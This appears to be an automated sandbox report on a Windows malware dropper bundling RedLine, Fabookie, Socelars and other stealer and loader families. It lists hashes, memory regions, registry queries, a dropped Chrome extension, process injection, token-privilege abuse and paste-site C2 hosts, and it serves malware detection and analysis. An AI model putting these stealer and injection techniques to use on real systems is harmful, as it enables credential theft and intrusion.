SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

memory/1624-144-0x0000000001080000-0x00000000010E8000-memory.dmp

memory/1960-143-0x0000000001280000-0x0000000001298000-memory.dmp

memory/1988-149-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-PEG5V.tmp\Sat1481f5a7e3eccdd.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

C:\Users\Admin\AppData\Local\Temp\is-L7CCU.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\is-L7CCU.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/468-151-0x0000000000400000-0x0000000000414000-memory.dmp

memory/964-148-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1288-142-0x0000000000EA0000-0x0000000000EA8000-memory.dmp

memory/1960-164-0x0000000000240000-0x0000000000246000-memory.dmp

memory/2216-179-0x0000000000A80000-0x0000000000C28000-memory.dmp

memory/2204-195-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2204-194-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2204-193-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2204-192-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2204-190-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2204-185-0x0000000000400000-0x000000000051C000-memory.dmp

memory/2892-215-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2892-213-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2892-212-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2892-211-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2892-209-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2892-207-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2892-205-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2892-203-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2216-216-0x0000000002BB0000-0x0000000002C55000-memory.dmp

memory/2216-220-0x0000000002C60000-0x0000000002CF2000-memory.dmp

memory/2216-223-0x0000000002C60000-0x0000000002CF2000-memory.dmp

memory/1924-224-0x0000000000400000-0x0000000000883000-memory.dmp

memory/1672-225-0x0000000000400000-0x000000000089C000-memory.dmp

memory/2216-229-0x0000000000A80000-0x0000000000C28000-memory.dmp

memory/2652-228-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1988-227-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1672-230-0x0000000000400000-0x000000000089C000-memory.dmp

memory/2216-238-0x0000000002C60000-0x0000000002CF2000-memory.dmp

memory/2216-240-0x0000000004AB0000-0x0000000004B3C000-memory.dmp

memory/2216-239-0x0000000002D00000-0x0000000004AAF000-memory.dmp

memory/2216-242-0x0000000004B40000-0x0000000004BC9000-memory.dmp

memory/2216-241-0x0000000004B40000-0x0000000004BC9000-memory.dmp

memory/2216-244-0x0000000004B40000-0x0000000004BC9000-memory.dmp

memory/2216-245-0x0000000000120000-0x0000000000121000-memory.dmp

memory/2216-246-0x0000000000130000-0x0000000000134000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab28A6.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-23 18:41

Reported

2024-11-23 18:43

Platform

win10v2004-20241007-en

Max time kernel

87s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat142b09ae40c44cf.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-KMO4M.tmp\Sat1481f5a7e3eccdd.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4840 set thread context of 4476 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1427fbafcf251.exe C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1427fbafcf251.exe

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14a7594cc5a0116.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1427fbafcf251.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat142b09ae40c44cf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1481f5a7e3eccdd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1427fbafcf251.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-KMO4M.tmp\Sat1481f5a7e3eccdd.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1487ca754e680f91.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat142ac5249376e895.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1481f5a7e3eccdd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-MQ2LG.tmp\Sat1481f5a7e3eccdd.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat144474a564d26f29.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14febbc433.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14a7594cc5a0116.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14a7594cc5a0116.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14a7594cc5a0116.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133768609156567246" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14febbc433.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14d32a38896785b13.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14f1396dfcf191bd.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5088 wrote to memory of 3164 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe
PID 5088 wrote to memory of 3164 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe
PID 5088 wrote to memory of 3164 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe
PID 3164 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
